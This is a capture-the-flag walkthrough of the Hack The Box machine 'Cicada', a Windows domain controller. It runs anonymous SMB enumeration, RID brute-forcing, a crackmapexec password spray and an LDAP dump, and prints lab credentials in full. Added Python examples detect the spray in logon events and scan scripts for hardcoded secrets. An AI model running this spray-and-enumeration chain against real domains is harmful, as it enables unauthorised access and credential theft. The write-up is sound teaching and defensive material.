Cicada
Season 6 Machine

Nmap results:
┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ nmap -sV -Pn 10.129.179.243
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-30 22:53 CEST
Nmap scan report for 10.129.179.243
Host is up (0.027s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-01 03:53:38Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.22 seconds

SMB
Let's look at SMB first.
┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ smbclient -L //10.129.179.243 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share

The HR share is the only one we seem to be able to access anonymously.
┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ smbclient //10.129.179.243/hr -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 13:29:09 2024
.. D 0 Thu Mar 14 13:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 19:31:48 2024

Let's download that file and check it out.
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (10.3 KiloBytes/sec) (average 10.3 KiloBytes/sec)

This is the content of that file:
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at [email protected].
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp

OK, so we have a password (Cicada$M6Corpb*@Lp#nZp!8) but no username.
I experimented a bit with crackmapexec, which is a really neat tool. Brute-forcing RIDs over the guest session enumerates the domain's accounts and groups:
┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ crackmapexec smb 10.129.179.243 -u 'guest' -p '' --rid-brute
SMB 10.129.179.243 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.179.243 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.129.179.243 445 CICADA-DC [+] Brute forcing RIDs
SMB 10.129.179.243 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.179.243 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.129.179.243 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.129.179.243 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.129.179.243 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB 10.129.179.243 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB 10.129.179.243 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup)
SMB 10.129.179.243 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup)
SMB 10.129.179.243 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup)
SMB 10.129.179.243 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias)
SMB 10.129.179.243 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup)
SMB 10.129.179.243 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup)
SMB 10.129.179.243 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.179.243 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.179.243 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.179.243 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup)
SMB 10.129.179.243 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup)
SMB 10.129.179.243 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.179.243 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.179.243 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.179.243 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.179.243 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.129.179.243 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB 10.129.179.243 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.179.243 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.129.179.243 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.129.179.243 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.129.179.243 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.129.179.243 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.129.179.243 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.129.179.243 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)

Now we have some usernames to try the previously obtained password against.
I had to try two before hitting the right one.
┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ crackmapexec smb 10.129.179.243 -u john.smoulder -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB 10.129.179.243 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.179.243 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ crackmapexec smb 10.129.179.243 -u sarah.dantelia -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB 10.129.179.243 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.179.243 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ crackmapexec smb 10.129.179.243 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB 10.129.179.243 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.179.243 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

Looks like michael.wrightson didn't change his default password, and his account has broader permissions than the unauthenticated guest session earlier:
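What just happened is a textbook password spray: one default password tried against several accounts, one failure per account, which stays well under any lockout threshold. From the defender's side the signal is not "many failures for one user" but "one source failing against many distinct users in a short window, then succeeding". The following is an added example written for this writeup, not code from the original post or from any of the tools used above. The event records are constructed to mirror what the DC's Security log would show (4625 failed logon, 4624 successful logon); in practice you would feed it real events exported from the log in the same shape.

```python
"""Detect a single-password spray from Windows Security logon events.

Added example for this writeup (not from the original post). The events
below are constructed to resemble the Cicada walkthrough: two failures and
one success from the same source within a few seconds.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: (timestamp, event_id, target_user, source_ip, status)
# 4625 = failed logon, 4624 = successful logon, 0xC000006D = bad credentials.
SAMPLE_EVENTS = [
    ("2024-10-01T03:55:01", 4625, "john.smoulder",     "10.10.14.5", "0xC000006D"),
    ("2024-10-01T03:55:03", 4625, "sarah.dantelia",    "10.10.14.5", "0xC000006D"),
    ("2024-10-01T03:55:05", 4624, "michael.wrightson", "10.10.14.5", "0x0"),
    # One user mistyping their own password three times is not a spray.
    ("2024-10-01T04:10:00", 4625, "emily.oscars",      "10.10.14.9", "0xC000006D"),
    ("2024-10-01T04:10:20", 4625, "emily.oscars",      "10.10.14.9", "0xC000006D"),
    ("2024-10-01T04:10:40", 4625, "emily.oscars",      "10.10.14.9", "0xC000006D"),
]


def parse_event(row):
    """Normalise one tuple into a dict with a real datetime and a lowercase user."""
    ts, event_id, user, src, status = row
    return {"ts": datetime.fromisoformat(ts), "id": event_id,
            "user": user.lower(), "src": src, "status": status}


def detect_spray(events, window=timedelta(minutes=10), min_users=2):
    """Return {source_ip: sorted distinct users} for every source whose 4625
    failures hit at least `min_users` different accounts inside `window`.

    Counting failures per account would miss this pattern entirely, because a
    spray produces only one failure per account. `min_users` is deliberately
    low here to match the three-account spray in the writeup; raise it for a
    production detection so that helpdesk staff testing accounts do not alert.
    """
    parsed = sorted((parse_event(r) for r in events), key=lambda e: e["ts"])
    failures = defaultdict(list)
    for e in parsed:
        if e["id"] == 4625:
            failures[e["src"]].append(e)

    hits = {}
    for src, evs in failures.items():
        # Slide a window over this source's failures, oldest first.
        for i, start in enumerate(evs):
            users = {x["user"] for x in evs[i:] if x["ts"] - start["ts"] <= window}
            if len(users) >= min_users:
                hits[src] = sorted(users)
                break
    return hits


def successes_after_spray(events, hits, window=timedelta(minutes=10)):
    """For each spraying source, list accounts that logged on successfully
    between its first failure and `window` after its last failure. Those are
    the accounts most likely sharing the sprayed password and need a reset."""
    parsed = [parse_event(r) for r in events]
    compromised = {}
    for src in hits:
        fails = [e for e in parsed if e["src"] == src and e["id"] == 4625]
        first_fail = min(e["ts"] for e in fails)
        last_fail = max(e["ts"] for e in fails)
        for e in parsed:
            if (e["src"] == src and e["id"] == 4624
                    and first_fail <= e["ts"] <= last_fail + window):
                compromised.setdefault(src, []).append(e["user"])
    return compromised


if __name__ == "__main__":
    found = detect_spray(SAMPLE_EVENTS)
    print("spraying sources:", found)
    print("accounts to reset:", successes_after_spray(SAMPLE_EVENTS, found))
```

The second function is the part worth keeping: once a spray is confirmed, the useful output is the list of accounts that accepted the sprayed password, since those still carry the default credential from the HR notice and need a forced reset.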
┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ crackmapexec smb 10.129.179.243 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
SMB 10.129.179.243 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.179.243 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.179.243 445 CICADA-DC [+] Enumerated shares
SMB 10.129.179.243 445 CICADA-DC Share Permissions Remark
SMB 10.129.179.243 445 CICADA-DC ----- ----------- ------
SMB 10.129.179.243 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.179.243 445 CICADA-DC C$ Default share
SMB 10.129.179.243 445 CICADA-DC DEV
SMB 10.129.179.243 445 CICADA-DC HR READ
SMB 10.129.179.243 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.179.243 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.179.243 445 CICADA-DC SYSVOL READ Logon server share

I didn't find anything useful using Michael's credentials, however.
Let's run ldapdomaindump:
┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ ldapdomaindump ldap://10.129.173.228 -u 'cicada.htb\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
The dump contains credentials for another user, 'david.orelious', and he has access to the 'DEV' share.
┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ smbclient //10.129.173.228/DEV -U 'david.orelious'
Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 13:31:39 2024
.. D 0 Thu Mar 14 13:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 19:28:22 2024

'Backup_script.ps1' contains hardcoded credentials for Emily Oscars:
┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

Emily is a member of the 'Remote Management Users' and 'Backup Operators' groups and has access to the C$ share.
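The backup script is the classic hardcoded-credential pattern: a literal password passed to ConvertTo-SecureString -AsPlainText, which gives a false sense of protection because the plaintext is right there in the file on a share several users can read. A simple scanner run over scripts in shares and repositories catches this before an attacker does. The code below is an added example written for this writeup, not code from the original post or from any tool used above; the sample script it scans is constructed to mirror the shape of Backup_script.ps1 with a placeholder instead of the real secret, and the regexes are heuristics, not an exhaustive secret detector.

```python
"""Flag hardcoded secrets in PowerShell scripts.

Added example for this writeup (not from the original post). SAMPLE_SCRIPT
is constructed: same shape as the share's Backup_script.ps1 but with
placeholder values instead of the real credential.
"""
import re

SAMPLE_SCRIPT = r'''
$sourceDirectory = "C:\smb"
$username = "emily.oscars"
$password = ConvertTo-SecureString "PLACEHOLDER-NOT-REAL" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
# The safe forms below take the secret from a prompt instead of a literal.
$safeCred = Get-Credential
$safePwd = Read-Host -AsSecureString
$apiToken = 'tok_PLACEHOLDER'
'''.strip()

# (finding kind, regex). Each regex captures the secret in a named group so
# it can be masked in the report rather than echoed into yet another file.
PATTERNS = [
    # A string literal handed straight to ConvertTo-SecureString -AsPlainText.
    ("plaintext-securestring",
     re.compile(r'ConvertTo-SecureString\s+(["\'])(?P<secret>[^"\']+)\1\s+-AsPlainText', re.I)),
    # A variable whose name suggests a secret, assigned a quoted literal.
    ("secret-variable-literal",
     re.compile(r'\$(?P<name>\w*(?:pass|pwd|secret|token|key)\w*)\s*=\s*(["\'])(?P<secret>[^"\']+)\2', re.I)),
]


def mask(secret):
    """Keep two characters so a reviewer can recognise the value, hide the rest."""
    return secret[:2] + "*" * (len(secret) - 2) if len(secret) > 2 else "**"


def scan_script(text):
    """Return a list of {line, kind, masked} findings for `text`.

    Comment lines are skipped; each line yields at most one finding. Lines that
    obtain the secret interactively (Get-Credential, Read-Host -AsSecureString)
    contain no quoted literal and therefore never match.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.strip().startswith("#"):
            continue
        for kind, rx in PATTERNS:
            m = rx.search(line)
            if m:
                findings.append({"line": lineno, "kind": kind,
                                 "masked": mask(m.group("secret"))})
                break
    return findings


if __name__ == "__main__":
    for f in scan_script(SAMPLE_SCRIPT):
        print(f"line {f['line']}: {f['kind']} -> {f['masked']}")
```

Run over every .ps1 pulled from the DEV and HR shares (or from a repository before it is pushed), the scanner reports line, pattern and a masked value only, so the report itself does not become another copy of the credential. The remediation for the backup job is the one the comment in the sample shows: prompt for the credential or load it from a protected store, and run the job under a dedicated account rather than a Backup Operators member whose password sits on a share.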
┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ smbclient //10.129.173.228/C$ -U 'emily.oscars'
Password for [WORKGROUP\emily.oscars]:
Try "help" to get a list of possible commands.
smb: \> ls
$Recycle.Bin DHS 0 Thu Mar 14 14:24:03 2024
$WinREAgent DH 0 Mon Sep 23 18:16:49 2024
Documents and Settings DHSrn 0 Thu Mar 14 20:40:47 2024
DumpStack.log.tmp AHS 12288 Tue Oct 8 03:49:38 2024
pagefile.sys AHS 738197504 Tue Oct 8 03:49:38 2024
PerfLogs D 0 Thu Aug 22 20:45:54 2024
Program Files DR 0 Thu Aug 29 21:32:50 2024
Program Files (x86) D 0 Sat May 8 11:40:21 2021
ProgramData DHn 0 Fri Aug 30 19:32:07 2024
Recovery DHSn 0 Thu Mar 14 20:41:18 2024
Shares D 0 Thu Mar 14 13:21:29 2024
System Volume Information DHS 0 Thu Mar 14 12:18:00 2024
Users DR 0 Mon Aug 26 22:11:25 2024
Windows D 0 Mon Sep 23 18:35:40 2024
4168447 blocks of size 4096. 336378 blocks available

After some digging I found the user flag here:
smb: \Users\emily.oscars.CICADA\Desktop\> ls
. DR 0 Wed Aug 28 19:32:18 2024
.. D 0 Thu Aug 22 23:22:13 2024
user.txt AR 34 Tue Oct 8 03:50:37 2024